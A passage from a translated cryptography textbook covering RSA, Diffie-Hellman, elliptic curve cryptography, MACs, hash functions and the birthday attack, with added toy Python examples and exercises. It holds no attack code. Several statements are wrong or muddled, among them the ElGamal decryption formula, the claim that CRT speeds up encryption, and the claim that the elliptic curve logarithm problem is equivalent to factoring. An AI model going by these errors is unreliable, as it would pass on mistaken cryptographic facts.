since $(-6)^2 \bmod 17 = 2$, so $(-6)^4 \bmod 17 = 4$, $(-6)^8 \bmod 17 = -1$, $(-6)^{16} \bmod 17 = 1$
c. $11^{-1} \bmod 17 = (-6)^{-1} \bmod 17 = 14$, so $c_2 = 11 \cdot (11^{-1} \bmod 17) = 11 \cdot (14 \bmod 17) = 154$
d. Hence M = (3 · 154) mod 187 = 462 mod 187 = 88

V.2.3 Exponentiation
Public-key encryption uses many exponentiations with large exponents, so a fast and efficient algorithm for this operation is needed. First the exponent is decomposed in base 2, that is, its binary representation is considered; then the square-and-multiply algorithm is applied. The idea is to repeat the basic square and multiply steps until the desired result is obtained. The complexity of the algorithm is $O(\log_2 n)$ multiplications for an exponent $n$.
Example:
$7^5 = 7^4 \cdot 7^1 = 3 \cdot 7 = 10 \bmod 11$, because
$7^2 = 7 \cdot 7 = 49 = 5 \bmod 11$
$7^4 = 7^2 \cdot 7^2 = 5 \cdot 5 = 3 \bmod 11$
$3^{129} = 3^{128} \cdot 3^1 = 5 \cdot 3 = 4 \bmod 11$

Decomposing the exponent in base 2
First convert the exponent from base 10 to base 2: $(11)_{10} = (1011)_2$. Then compute as follows:

$M^{11} = M^{1 \cdot 2^3 + 0 \cdot 2^2 + 1 \cdot 2^1 + 1 \cdot 2^0} = (M^{1 \cdot 2^2 + 0 \cdot 2^1 + 1 \cdot 2^0})^2 M = ((M^{1 \cdot 2^1 + 0 \cdot 2^0})^2 M)^2 M = ((M^2)^2 M)^2 M$

Exponentiation algorithm
Suppose $b_1 b_2 \ldots b_k$ is the base-2 representation of $c$. Compute $a^c \bmod n$.
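The key setup of V.2.1, the worked example of V.2.2 (including its Chinese Remainder Theorem shortcut) and the square-and-multiply method of V.2.3, as an added example that is not code from the textbook. The function names are assumptions chosen here; the numbers p = 17, q = 11, e = 7, M = 88 are the chapter's own.

```python
# Added example (not from the textbook): square-and-multiply and RSA with CRT
# decryption, checked against the chapter's numbers (p=17, q=11, e=7, M=88).
from math import gcd


def mod_exp(a, c, n):
    """Left-to-right square and multiply: returns a**c mod n.

    d accumulates the result while the bits of the exponent c are scanned
    from the most significant one.
    """
    d = 1
    for bit in bin(c)[2:]:
        d = (d * d) % n          # square once for every bit
        if bit == "1":
            d = (d * a) % n      # multiply only when the bit is set
    return d


def ext_gcd(a, b):
    """Extended Euclid: returns (g, x, y) with a*x + b*y == g == gcd(a, b)."""
    if b == 0:
        return a, 1, 0
    g, x, y = ext_gcd(b, a % b)
    return g, y, x - (a // b) * y


def mod_inverse(a, m):
    g, x, _ = ext_gcd(a % m, m)
    if g != 1:
        raise ValueError("no inverse: gcd(a, m) != 1")
    return x % m


def rsa_keygen(p, q, e):
    """Returns (KU, KR) = ((e, N), (d, p, q)) as in section V.2.1."""
    n, phi = p * q, (p - 1) * (q - 1)
    if not 1 < e < phi or gcd(e, phi) != 1:
        raise ValueError("need 1 < e < phi(N) and gcd(e, phi(N)) = 1")
    return (e, n), (mod_inverse(e, phi), p, q)


def rsa_encrypt(m, ku):
    e, n = ku
    if not 0 <= m < n:
        raise ValueError("message block must satisfy 0 <= M < N")
    return mod_exp(m, e, n)


def rsa_decrypt(c, kr):
    d, p, q = kr
    return mod_exp(c, d, p * q)


def rsa_decrypt_crt(c, kr):
    """Decrypt modulo p and modulo q separately, then recombine the residues."""
    d, p, q = kr
    m_p = mod_exp(c % p, d % (p - 1), p)     # exponent reduced mod p-1 (Fermat)
    m_q = mod_exp(c % q, d % (q - 1), q)
    h = (mod_inverse(q, p) * (m_p - m_q)) % p
    return m_q + h * q                       # unique value in [0, N)


if __name__ == "__main__":
    KU, KR = rsa_keygen(17, 11, 7)
    C = rsa_encrypt(88, KU)
    print("KU =", KU, "KR =", KR)
    print("C =", C, "M =", rsa_decrypt(C, KR), "M via CRT =", rsa_decrypt_crt(C, KR))
```

The CRT path works with two half-size moduli and half-size exponents, which is where the speed-up discussed for decryption comes from.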

In the algorithm above, the value of c is used only to check the exponent of the power. d is the power being computed and a is the base.

V.2.4 Efficient encryption
Encryption uses exponentiation by the public key e. If e is small the computation is fast, but the scheme is easier to attack. e is usually chosen less than or equal to 65537 ($2^{16}+1$), that is, the public key is 16 bits long. In the example above, for instance, we can choose e = 23 or e = 7. Encryption can be computed quickly if n = pq is known, by using the Chinese Remainder Theorem on the message M modulo p and modulo q separately. If the public key e is fixed, one must make sure that the chosen n always satisfies $\gcd(e, \varphi(n)) = 1$: discard every p, q for which $\varphi(n)$ is not relatively prime to e.

V.2.5 Efficient decryption
The Chinese Remainder Theorem can be used to compute modulo p and modulo q and then combine the results to obtain the plaintext. The holder of the private key knows p and q, so this technique is available. Decrypting with the Chinese Remainder Theorem is about 4 times faster than decrypting directly.

V.2.6 RSA key generation
An RSA user has to determine two very large random primes, typically about 512 bits each. There are many solutions with high reliability for generating p and q at random and testing their primality probabilistically. Once a key e or d relatively prime to $\varphi(n)$ has been chosen, the other key is easily computed as its inverse using the extended Euclidean algorithm.

V.2.7 Security of RSA
In practice there are several different ways of attacking the RSA public-key cipher. Brute-force key search is infeasible when the numbers are large enough. Mathematical attacks rely on the difficulty of computing $\varphi(n)$, either by factoring n into the two primes p and q or by trying to compute $\varphi(n)$ directly. In the course of cryptanalysis research, timing attacks on decryption were proposed, which infer information about the key from the speed of encrypting and decrypting given messages. Finally, there is research on attacking RSA when chosen ciphertexts are available.
In detail:

The factoring problem
Mathematical attacks take three forms
o Factor N = p·q, then compute $\varphi(N)$ and d
o Find $\varphi(N)$ directly and compute d
o Find d directly
All of these are currently believed to be equivalent to the factoring problem
o Progress has been slow over time
o RSA with 1024 or 2048 bits is currently considered secure

Timing attacks
o Developed in the mid-1990s
o Paul Kocher showed that a cryptanalyst can determine the private key by observing how long a computer takes to decrypt messages.
o Timing attacks apply not only to RSA but also to other public-key cryptosystems.
o A timing attack is like a burglar guessing a phone number by observing how long someone takes to turn the telephone dial from one number to the next.

Chosen-ciphertext attacks
o RSA is vulnerable to chosen-ciphertext attacks
o The attacker chooses ciphertexts and guesses the decrypted plaintext
o Ciphertexts are chosen so that properties of RSA yield information for cryptanalysis
o Random padding of the plaintext can be used against this
o Or asymmetric encryption padding can be used.

V.3 Key management

V.3.1 Key distribution
Public-key cryptography helps solve the key distribution problem: there is a pressing need for a key-sharing mechanism in an environment where information is exchanged frequently and keys change frequently. It has two aspects:
o Distributing keys publicly while still guaranteeing secrecy.
o Using public-key cryptography to distribute secret keys (the secret keys being used to encrypt information).

V.3.2 Distribution of public keys
Public keys can be distributed in one of the following ways:
o Public announcement of the user's key.
o A publicly accessible directory.
o A public-key authority that holds the public keys.
o Public-key certificates: the user's public key is certified by a competent authority.

Public announcement
Users distribute their public key to recipients or broadcast it to the community. For example, users can append their PGP key to e-mail messages or post it to newsgroups or a mailing list. The main weakness of public announcement is forgery: anyone can create a key, claim to be someone else and broadcast the announcement to everyone. Until the forgery is discovered, the impostor can masquerade as the claimed user.

Publicly accessible directory
Greater security can be obtained with a publicly accessible directory, by registering keys with a public directory that publishes them and shares them with everyone. The directory must be trusted and have the following properties:
o It contains {name, public key} entries
o Users register securely with the directory
o Users can replace their key at any time
o The directory is published periodically
o The directory can be accessed over the network

This model still has weaknesses that let an intruder tamper with or forge entries after getting into the system.

Public-key authority
This improves security by tightening, centralised control over the distribution of keys from the directory. It has the properties of a directory described above and requires users to know the public key of the directory. Users then obtain any desired public key securely by accessing the directory in real time whenever a key is needed. The requirement for real-time access is, however, a drawback of this method of key distribution. Specifically, in the following scenario two users share their public keys with each other by using the public key of the authority to obtain the partner's public key, and exchange messages back and forth to confirm that each one knows the other's information.

Public-key certificates
Certificates allow keys to be exchanged without real-time access to the public-key directory authority. To do this, a certificate binds the identity of a user to his public key and the certificate is "stamped" to prevent forgery. The accompanying information usually includes the validity period, usage rights, expiry and so on. This content is signed with the trusted private key of the Certificate Authority (CA). Because the CA's public key is widely announced, the certificate can be verified by anyone who knows the public key of the Certificate Authority.


V.3.3 Public-key distribution of secret keys
In general the methods above can be used to obtain the public key of the person one intends to communicate with. That public key is used to encrypt, decrypt or confirm that information belongs to the partner. But public-key algorithms are slow, so the cost of protecting information this way is high. Therefore a symmetric key, also called a session key, is normally used to encrypt and decrypt the message content. There are several ways for two users to agree on a suitable session key.

Simple secret key distribution
Proposed by Merkle in 1979
o A generates a new temporary public key pair
o A sends B the public key and their identity
o B generates a session key and sends it to A, encrypted with the supplied public key
o A decrypts the session key and both use it.
The problem is that an adversary can intercept or impersonate both sides of the protocol.
If public keys are available, the session key is exchanged securely.

V.3.4 Hybrid key exchange
A Key Distribution Centre can be combined with the above to distribute session keys, as in the IBM mainframe model. The centre shares a master key with each user and distributes session keys using the master key shared with the centre. A public-key scheme is used to distribute the master keys. This three-level scheme is especially useful when users are widely distributed. The basic requirements of the system are performance and platform compatibility.

V.4 Diffie-Hellman key exchange

V.4.1 Requirements
Diffie-Hellman key exchange is the first public-key scheme, proposed by Diffie and Hellman in 1976 together with the concept of public-key cryptography. It later became known that James Ellis (UK) had secretly proposed a similar model in 1970. It is a practical method for the public exchange of secret keys. It stimulated research into public-key ciphers, and the scheme is used in many commercial products.
It is a secret-key exchange scheme that uses public keys:
o It cannot be used to exchange an arbitrary message.
o However, it can establish a common key.
o The key is known only to the two parties.
o The value of the key depends on the parties (and on their public-key and private-key information).
o It is based on exponentiation in a finite field (modulo a prime or a polynomial), which is an easy problem.
o Its security relies on the difficulty of computing discrete logarithms (similar to the factoring problem), which is a hard problem.

V.4.2 Diffie-Hellman setup
All users agree on common parameters:
o A very large prime q or a polynomial.
o $\alpha$, a primitive root mod q.
Each user (A, say) generates their key:
o Choose A's secret key (a number): $x_A < q$
o Compute A's public key: $y_A = \alpha^{x_A} \bmod q$
o Each user announces their public key $y_A$.

V.4.3 Diffie-Hellman key exchange
The shared session key for the two users A and B is $K_{AB}$:
$K_{AB} = \alpha^{x_A x_B} \bmod q$
$= y_A^{x_B} \bmod q$ (which B can compute)
$= y_B^{x_A} \bmod q$ (which A can compute)
$K_{AB}$ is used as the session key in a private-key scheme between A and B.
When A and B communicate with each other, they keep the common key $K_{AB}$ until they choose new keys.
A cryptanalyst needs x and therefore has to solve a discrete logarithm.

Example:
Two users, Alice and Bob, want to exchange a session key:
Agree on the prime q = 353 and $\alpha$ = 3
Choose random secret keys: A chooses $x_A = 97$, B chooses $x_B = 233$
Compute the public keys:
$y_A = 3^{97} \bmod 353 = 40$ (Alice)
$y_B = 3^{233} \bmod 353 = 248$ (Bob)
Compute the shared session key:
$K_{AB} = y_B^{x_A} \bmod 353 = 248^{97} = 160$ (Alice)
$K_{AB} = y_A^{x_B} \bmod 353 = 40^{233} = 160$ (Bob)

V.5 Elliptic curve cryptography
To guarantee security, most public-key ciphers use arithmetic on very large integers or on polynomials of high degree. A significant load is therefore placed on memory to handle keys and messages, which both costs memory and easily weakens security. To overcome this while keeping the security of public-key cryptography, an alternative was proposed: elliptic curves. Here the operations are carried out on bit strings of smaller size.

V.5.1 Real elliptic curves
An elliptic curve is defined by an equation in two variables x, y with real coefficients. Consider cubic elliptic curves of the form
$y^2 = x^3 + ax + b$
where x, y, a, b are real numbers, together with an additional point O.
There is an addition operation on an elliptic curve
o Geometrically, the sum of P and Q is the reflection of the intersection point R
o The point O acts as the identity for addition and is the point at infinity.

V.5.2 Finite elliptic curves
Elliptic curve cryptography uses elliptic curves whose variables and coefficients are finite. Two families are in general use:
o Prime curves $E_p(a,b)$ defined over $Z_p$
  Use integers modulo a prime
  Best in software
o Binary curves $E_{2^n}(a,b)$ defined over $GF(2^n)$
  Use polynomials with binary coefficients
  Best in hardware

V.5.3 Elliptic Curve Cryptography (ECC)
In ECC, addition plays the role of modular multiplication, and repeated addition (that is, multiplying a point by a coefficient) plays the role of modular exponentiation. The following problem in ECC is a hard problem equivalent to the discrete logarithm problem:
o Suppose Q = k·P, where P and Q are two points on the elliptic curve
o Q is easy to compute given P and k
o k is very hard to find given P and Q.
Finding the coefficient k is the hard problem, the elliptic curve logarithm problem. Elliptic curve cryptography relies on this hard one-way problem to hide the private key.
Example: consider $E_{11}(1,6)$. The following additions are carried out modulo 11.

V.5.4 ECC Diffie-Hellman
Based on the difficulty of finding the coefficient that relates two points, as described above, the ECC Diffie-Hellman key exchange scheme was introduced, analogous to ordinary Diffie-Hellman key exchange. Ordinary modular exponentiation is replaced by multiplication of a point by a coefficient in ECC, and the discrete logarithm is replaced by the operation of finding the coefficient relating two given points. The latter is the hard problem that determines the security of the scheme for publicly establishing a common key.

The group of users agrees on a suitable elliptic curve $E_p(a,b)$.
Choose a base point $G = (x_1, y_1)$ of large order, that is, with large n such that nG = O.
The two users A and B choose their private keys: $n_A < n$, $n_B < n$.
They then compute the public keys of A and B: $P_A = n_A \times G$, $P_B = n_B \times G$, and publish $P_A$ and $P_B$.
The two users share the secret key $K = n_A \times n_B \times G$.
Each of them can compute the common key by multiplying their own private key by the partner's public key:
$K = n_A \times P_B$, $K = n_B \times P_A$

V.5.5 ECC encryption and decryption
There are several ways of using elliptic curves to build a public-key cipher; we consider the simplest one:
First the group of users must agree on a suitable elliptic curve and a point G, as in ECC Diffie-Hellman key exchange.
Each message M is regarded as a point $P_M$ on that elliptic curve.
Each user chooses a private key $n_A < n$
and computes the public key to publish, $P_A = n_A \times G$.
ECC encrypts the message M, corresponding to the point $P_M$ on the elliptic curve, by forming the ciphertext $C_M$ as a pair of points on the curve:
$C_M = \{kG, P_M + k P_B\}$, where k is a random number
To decrypt and recover $P_M$, the following operation is applied to the two points of $C_M$:
$P_M + k P_B - n_B(kG) = P_M + k(n_B G) - n_B(kG) = P_M$

Security of ECC
It relies on the problem of finding the coefficient relating two points on an elliptic curve, called the elliptic curve logarithm problem. The fastest known method for solving it is the "Pollard rho method". The problem is equivalent to the factoring problem, but much smaller key sizes can be used, for example compared with RSA. It has been shown that for equal key lengths the computations are in general equivalent. So for the same level of security, ECC has many advantages in storage space and in the accompanying security.
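Point addition on a prime curve, the ECC Diffie-Hellman exchange of V.5.4 and the encryption/decryption of V.5.5, as an added example that is not code from the textbook. It uses the curve $E_{11}(1,6)$ named in V.5.3; the base point G = (2, 7), the private keys, k and the message point are assumptions constructed for illustration, and the class and function names are chosen here.

```python
# Added example (not from the textbook): arithmetic on the prime curve
# E_p(a, b): y^2 = x^3 + a*x + b (mod p), then ECC Diffie-Hellman and the
# encrypt/decrypt scheme of V.5.5. Toy parameters, constructed for illustration.
O = None                                   # point at infinity (additive identity)


class Curve:
    def __init__(self, p, a, b):
        if (4 * a**3 + 27 * b**2) % p == 0:
            raise ValueError("singular curve")
        self.p, self.a, self.b = p, a, b

    def on_curve(self, P):
        if P is O:
            return True
        x, y = P
        return (y * y - (x**3 + self.a * x + self.b)) % self.p == 0

    def neg(self, P):
        return O if P is O else (P[0], -P[1] % self.p)

    def add(self, P, Q):
        if P is O:
            return Q
        if Q is O:
            return P
        (x1, y1), (x2, y2), p = P, Q, self.p
        if x1 == x2 and (y1 + y2) % p == 0:
            return O                       # P + (-P) = O, also covers y = 0
        if P == Q:                         # tangent slope for doubling
            lam = (3 * x1 * x1 + self.a) * pow((2 * y1) % p, -1, p) % p
        else:                              # chord slope for distinct points
            lam = (y2 - y1) * pow((x2 - x1) % p, -1, p) % p
        x3 = (lam * lam - x1 - x2) % p
        return (x3, (lam * (x1 - x3) - y1) % p)

    def mul(self, k, P):
        """Double-and-add: the additive analogue of square-and-multiply."""
        R = O
        while k > 0:
            if k & 1:
                R = self.add(R, P)
            P = self.add(P, P)
            k >>= 1
        return R

    def order(self, G):
        """Smallest n with nG = O (only sensible for toy curves)."""
        n, R = 1, G
        while R is not O:
            R, n = self.add(R, G), n + 1
        return n


def ecdh(curve, G, n_a, n_b):
    """Returns (P_A, P_B, K as computed by A, K as computed by B)."""
    P_a, P_b = curve.mul(n_a, G), curve.mul(n_b, G)
    return P_a, P_b, curve.mul(n_a, P_b), curve.mul(n_b, P_a)


def ecc_encrypt(curve, G, P_b, P_m, k):
    """C_M = {kG, P_M + k*P_B}; k must be fresh and random in real use."""
    return curve.mul(k, G), curve.add(P_m, curve.mul(k, P_b))


def ecc_decrypt(curve, n_b, C_m):
    """P_M = (P_M + k*P_B) - n_B*(kG)."""
    kG, masked = C_m
    return curve.add(masked, curve.neg(curve.mul(n_b, kG)))


E11 = Curve(11, 1, 6)      # the curve E_11(1,6) named in V.5.3
G = (2, 7)                 # assumed base point (not given on the page)

if __name__ == "__main__":
    print("order of G:", E11.order(G))
    print("ECDH (P_A, P_B, K_A, K_B):", ecdh(E11, G, 3, 7))
    C = ecc_encrypt(E11, G, E11.mul(7, G), (10, 9), k=5)
    print("ciphertext:", C, "decrypted:", ecc_decrypt(E11, 7, C))
```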


Exercises
1. Compute the RSA encryption for the following data:
   p = 7, q = 11, e = 3.
   User A chooses the private key xA = 7; compute A's public key.
   User B sends the message M = 5, encrypted with A's public key.
   User A decrypts using the Chinese Remainder Theorem.
2. Compute the RSA encryption for the following data:
   p = 11, q = 13, e = 7.
   User A chooses the private key xA = 9; compute A's public key.
   User B sends the message M = 7, encrypted with A's public key.
   User A decrypts using the Chinese Remainder Theorem.
3. Compute the RSA encryption for the following data:
   p = 23, q = 31.
   User A chooses the private key xA = 13; compute A's public key.
   User B sends the message M = 20, encrypted with A's public key.
   User A decrypts using the Chinese Remainder Theorem.
4. Diffie-Hellman key exchange:
   Choose the common prime q = 131 and $\alpha$ = 7.
   User A chooses the private key xA = 11.
   User B chooses the private key xB = 19.
   Compute the public keys of A and B.
   State how A and B compute the secret key shared between A and B.
5. Diffie-Hellman key exchange:
   Choose the common prime q = 131 and $\alpha$ = 7.
   User A chooses the private key xA = 11.
   User B chooses the private key xB = 19.
   Compute the public keys of A and B.
   State how A and B compute the secret key shared between A and B.
6. Elliptic curve cryptography
   Given the elliptic curve $y^2 = (x^3 + x + 1) \bmod 13$. Draw the graph of this curve.
   Let G = (4, 2).
   User A chooses the private key xA = 2.
   User B chooses the private key xB = 3.
   Compute the public keys of A and B.
   State how A and B compute the secret key shared between A and B.
7. Elliptic curve cryptography
   Given the elliptic curve $y^2 = (x^3 + x + 1) \bmod 23$.
   Let G = (3, 10).
   User A chooses the private key xA = 2.
   User B chooses the private key xB = 3.
   Compute the public keys of A and B.
   State how A and B compute the secret key shared between A and B.
8. ElGamal cipher:
   Given the system $(G, \alpha, \beta)$, where G is a group under multiplication and $\alpha$, $\beta$ are two elements of G.
   $G$, $\alpha$, $\beta$ are public.
   The integer exponent a satisfying $\alpha^a = \beta$ is kept secret (finding a requires solving the discrete logarithm problem, which is hard).
   A message M is encrypted by choosing a random number k and computing:
   $C = E(M) = (y_1, y_2) = (\alpha^k, M \cdot \beta^k)$
   Decryption: $C = y_2 \cdot (y_1^a)^{-1}$
   a) Apply the example above with p = 79, $\alpha$ = 5, a = 3, M = 19 and k = 4. Here the multiplicative group is $Z_p$; compute $\beta$. Find the ciphertext C of the plaintext M and decrypt it.
   b) Apply the example above with p = 191, $\alpha$ = 7, a = 5, M = 29 and k = 9. Here the multiplicative group is $Z_p$; compute $\beta$. Find the ciphertext C of the plaintext M and decrypt it.
   c) Apply the example above with p = 191, $\alpha$ = 7, a = 5, M = 29 and k = 9. Here the multiplicative group is $Z_p$; compute $\beta$. Find the ciphertext C of the plaintext M and decrypt it.
9. Give an algorithm for computing a power of a given base. Assess the complexity of that algorithm.
10. Why can it be said that decrypting with the Chinese Remainder Theorem is 4 times faster than decrypting without it?

CHAPTER 6: MESSAGE AUTHENTICATION AND HASH FUNCTIONS

VI.1 Message authentication

VI.1.1 Concepts
Message authentication concerns the following aspects of transmitting messages over a network:
o Protecting the integrity of the message: protecting the message from being altered, or having measures that detect an alteration made in transit.
o Verifying identity and origin: checking whether the message was really sent by the person named as sender or by some impostor.
o Non-repudiation of origin: where necessary, the message itself contains information proving that only the named sender could have sent it and nobody else could have done so. The sender therefore cannot deny the act of sending, the time of sending or the content of the message.
Additional security requirements such as encryption can also be considered. To meet these requirements, three alternative functions are used:
o Message encryption with a symmetric or public-key cipher.
o Message authentication code (MAC): uses a key and a function that compresses the message to be sent, producing a characteristic value attached to the message and tied to its sender.
o Hash function: a function that compresses the message into a "fingerprint" of the message.

Security requirements when transmitting messages over a network. Measures are needed against the following hostile actions:
o Disclosure: keep the message content secret, known only to authorised persons.
o Traffic analysis: prevent monitoring or delaying of the transmission.
o Masquerade: sending messages in someone else's name.
o Content modification: changing, truncating, adding or removing information.
o Changing the order of the small packets of a transmitted message.
o Timing modification: delaying the message.
o Source repudiation: do not allow the sender to deny responsibility as author of the message.
o Destination repudiation: do not allow the receiver to deny the existence and arrival of the message that was sent.

VI.1.2 Message encryption
Message encryption by itself provides a measure of authentication, because the key is shared between sender and receiver, and altering the content is not easy without the key.
Specifically, if a symmetric cipher is used, the receiver knows that the sender must have created the message, because only the sender and the receiver know the key in use. The receiver can tell that the content has not been altered if the message has suitable structure, redundancy and a checksum to detect any change.
If a public key is used, encryption does not provide sufficient assurance about the sender, because anyone may know the receiver's public key. However, if the sender signs the message with their private key and then encrypts it with the receiver's public key, both the confidentiality and the authenticity of the message are ensured.
Additional measures are needed to detect corrupted messages. Using the sender's private key together with the receiver's public key has many advantages, but the price is slowness, because two public-key operations are applied to the message.

VI.1.3 Message Authentication Code (MAC)
A MAC is produced by an algorithm that creates a small block of information of fixed size
o It depends on both the message and some key.
o It is like encryption, but need not be reversible.
It is appended to the message like a signature and sent with it as proof of authenticity. The receiver performs a computation on the message and checks whether the result matches the attached MAC. This gives confidence that the message has not been altered and that it comes from the sender.

Message authentication codes give the receiver assurance that the message has not been altered and that it comes from the named sender. A MAC can also be used together with encryption for confidentiality. In general separate keys are used for each, and the MAC can be computed before or after encryption; it is better to compute the MAC first and encrypt afterwards.
A drawback of the MAC is that it depends on both the message and the sender, while sometimes only the message needs to be authenticated and the authenticating information should depend only on the message, to be stored as evidence of its integrity. In that case a hash function is used instead of a MAC. Note that a MAC is not a digital signature, because both the sender and the receiver know the key.

Properties of a MAC
A MAC is a condensed form of the message combined with a key
$MAC = C_K(M)$
o Condenses a message M of arbitrary length
o Uses a secret key K
o Produces an authenticator of fixed length
o It is a many-to-one function, meaning that many different messages have the same MAC. The MAC function must nevertheless be chosen so that the probability of meaningful messages having the same MAC is very small, and finding such messages is very difficult.

Requirements for a MAC
Depending on the kind of attack, a MAC needs different properties to resist it. In general a MAC must satisfy the following:
o Knowing a message and its MAC, it is infeasible to find another message with the same MAC.
o MACs should be uniformly distributed.
o The MAC should depend equally on all bits of the message, that is, changing any one bit of information changes the MAC accordingly.

VI.1.4 Using symmetric ciphers for a MAC
Any block cipher chaining mode can be used, with the final cipher block serving as the MAC of the message. The Data Authentication Algorithm (DAA) is a widely used MAC based on DES-CBC, in which
o The initial vector IV = 0 is used, with zero padding of the final block
o The message is encrypted with the Data Encryption Standard DES in CBC mode
o The final block is sent as the MAC of the whole message
  or the leftmost M bits (16 ≤ M ≤ 64) of the final block
But a final MAC of 64 bits is now also too small to guarantee security, so ways of building larger MACs have been sought.

VI.2 Hash functions

VI.2.1 Requirements
A hash function condenses an arbitrary message to a fixed size. The hash function is assumed to be public and not keyed. The hash depends only on the message, whereas a MAC additionally depends on the key.
A hash is used to detect changes to a message. It can be used with the message in several different ways and is often combined with other mechanisms to create a signature on the message.

Properties of hash functions
A hash function produces a fingerprint (that is, characteristic information) of a file, message or data:
h = H(M)
It condenses a message of arbitrary size to a fingerprint of fixed size. The hash function is assumed to be public; everyone knows how to use it.

Requirements for hash functions
It can be applied to any message of arbitrary size, but it must produce an output h of fixed size, typically 128 bits to 1024 bits.
It is easy to compute h = H(M) for any message M: the function H is fast and efficient to compute, depends strongly on the message M and cannot be computed in reverse.
Given h, it is infeasible (very hard) to find x such that H(x) = h. This is called the one-way property: finding a preimage is very hard, although computing the image is easy.
Given x, it is infeasible to find y such that H(y) = H(x). This is weak collision resistance: no message with the same hash as the given message can be found.
It is also infeasible to find any x, y such that H(y) = H(x). This is called strong collision resistance, a stronger requirement than weak collision resistance.

VI.2.2 Simple hash functions
There are several proposals for simple hash functions. For example, represent the message as bits and divide them into blocks whose size equals the desired hash size. Then XOR the bits in corresponding positions of the blocks; the result is the hash of the whole message.
This hash function is not secure, because for any message another message with the same hash can be found. A stronger function is needed, which will be considered in the next chapter.

Birthday attack
One might think a 64-bit hash is secure, meaning that it is hard to find messages with the same hash. This is not so, because of the birthday paradox: what is the minimum number of students in a class for the probability that at least 2 students share a birthday to be greater than 0.5? By probability theory, let the minimum number of students in the class be k; then the probability q that no two people share a birthday is the ratio of the number of ways of choosing k different days out of 365 to the number of ways of choosing any k days out of 365. Thus
$q = C^k_{365} / 365^k$
So the probability p that at least 2 people share a birthday is
$p = 1 - q = 1 - C^k_{365} / 365^k$
For p > 0.5 we need k > 22, that is k = 23, for which p = 0.5073.
Before doing the detailed calculation one would think that the class needs at least about 365/2, that is 184, students. In fact the number is far smaller, only 23 students, which is why this is called the birthday paradox. The point is that in many cases the probability of two messages having the same hash is not as small as we imagine.
The birthday attack works as follows
o The cryptanalyst generates $2^{m/2}$ variations of the valid message, all with essentially the same meaning, where m is the length of the hash code.
o The cryptanalyst also generates $2^{m/2}$ different variations of the fraudulent message, that is, with the opposite meaning.
o The two sets are compared to find a pair with the same hash (probability >= 0.5 by the birthday paradox).
o The user signs the valid message, which is then replaced by the fraudulent message that also carries a valid signature.
The conclusion is that an even larger MAC size has to be used.
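The birthday bound worked out numerically, as an added example that is not code from the textbook: it recomputes the 23-student figure and then measures how many hashes are needed before two inputs collide on an m-bit digest, to compare with $2^{m/2}$. The m-bit hash is simulated by truncating SHA-256, and the function names and the constructed input strings are assumptions made here.

```python
# Added example (not from the textbook): why the digest length m must be
# sized against 2^(m/2) rather than 2^m.
import hashlib


def birthday_probability(k, days=365):
    """p = 1 - q, where q is the chance that k people all have distinct birthdays."""
    q = 1.0
    for i in range(k):
        q *= (days - i) / days
    return 1.0 - q


def smallest_group(threshold=0.5, days=365):
    """Smallest k for which the collision probability exceeds the threshold."""
    k = 1
    while birthday_probability(k, days) <= threshold:
        k += 1
    return k


def truncated_hash(message: bytes, m_bits: int) -> int:
    """Top m_bits of SHA-256, standing in for an m-bit hash function."""
    digest = int.from_bytes(hashlib.sha256(message).digest(), "big")
    return digest >> (256 - m_bits)


def trials_until_collision(m_bits: int, prefix: bytes = b"variant-"):
    """Hash prefix+counter until two different inputs share an m-bit hash.

    Returns (number of hashes computed, first message, second message).
    The inputs are constructed strings, not real documents.
    """
    seen = {}
    counter = 0
    while True:
        msg = prefix + str(counter).encode()
        h = truncated_hash(msg, m_bits)
        counter += 1
        if h in seen:
            return counter, seen[h], msg
        seen[h] = msg


if __name__ == "__main__":
    print("students needed:", smallest_group(), "p =", round(birthday_probability(23), 4))
    for m in (16, 20, 24):
        n, a, b = trials_until_collision(m)
        print(f"m={m}: collision after {n} hashes (2^(m/2) = {2 ** (m // 2)})")
```

The measured counts stay within a small factor of $2^{m/2}$, so a 64-bit digest offers only about 32 bits of collision resistance.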

VI.2.3 Block ciphers as hash functions
A block cipher can be used as a hash function
o Use $H_0 = 0$ and zero padding for the final block
o Compute $H_i = E_{M_i}[H_{i-1}]$
o Use the final block as the hash value
o This is like CBC mode but without a key
The resulting hash is too small (64 bits)
o Both because of the direct birthday attack
o And because of the meet-in-the-middle attack
Other variants are also vulnerable to attack.

VI.2.4 Security of hash functions and MACs
As with block ciphers, hash functions are subject to brute-force attacks. Specifically, strong collision resistance has a cost of $2^{m/2}$: with m the length of the hash code, $2^{m/2}$ determines its strength against brute-force attack. m has to be chosen large enough that searching $2^{m/2}$ candidates is infeasible. There has been a proposal concerning the 128-bit hash MD5 in hardware, but a collision can be found after 24 days. A 128-bit hash can therefore be regarded as vulnerable and not secure; a 160-bit hash is better.
Brute-force attacks on a MAC are harder, because they require known message-MAC pairs, since the MAC additionally depends on the key. The attack can be directed at the key space (that is, searching for the key) or at the MAC. A MAC length of at least 128 bits is needed to guarantee security.

Cryptanalytic attacks that exploit structure
As with block ciphers, where brute force is the reference attack, a number of cryptanalytic attacks are the best options currently available. For example
if $CV_i = f[CV_{i-1}, M_i]$; $H(M) = CV_N$
then the attack typically exploits collisions of the function f.
Like block ciphers, hash functions usually consist of a number of rounds, and attacks use the properties of the round functions.

VI.3 Hash and MAC algorithms

VI.3.1 Hash and MAC algorithms
Hash function: condenses a message to a fixed size by processing the message block by block with some compression function; a block cipher can be used.
Message authentication code (MAC): creates a fixed-size authenticator for the message, providing message integrity and authenticity through the use of a key. It can be built from a block cipher in a chaining mode or from a hash function.

Figure: Structure of a hash algorithm


VI.3.2 The Secure Hash Algorithm (SHA)
SHA originated from the US National Institute of Standards and Technology (NIST) and the NSA in 1993, and was revised in 1995 as a US standard; the standard is FIPS 180-1 1995 and Internet RFC3174, referred to as SHA-1. It is used with the DSA (Digital Signature Algorithm) digital signature scheme. The SHA algorithm is based on the design of MD4 with some differences, and produces a 160-bit hash value. Research results from 2005 on the security of SHA-1 make proposals regarding its use in the future.
The SHA-1 and MD5 algorithms are described in detail below.

The SHA-1 algorithm

Description of the algorithm
The input of the algorithm is a message of any length less than $2^{64}$ bits; SHA-1 outputs a message digest 160 bits long.

Message expansion:
f(t;B,C,D) is defined as follows.
    f(t;B,C,D) = (B AND C) OR ((NOT B) AND D)         (0 ≤ t ≤ 19)
    f(t;B,C,D) = B XOR C XOR D                        (20 ≤ t ≤ 39)
    f(t;B,C,D) = (B AND C) OR (B AND D) OR (C AND D)  (40 ≤ t ≤ 59)
    f(t;B,C,D) = B XOR C XOR D                        (60 ≤ t ≤ 79)
The message M is expanded before hashing. The purpose of the expansion is to make the length of the expanded message a multiple of 512.
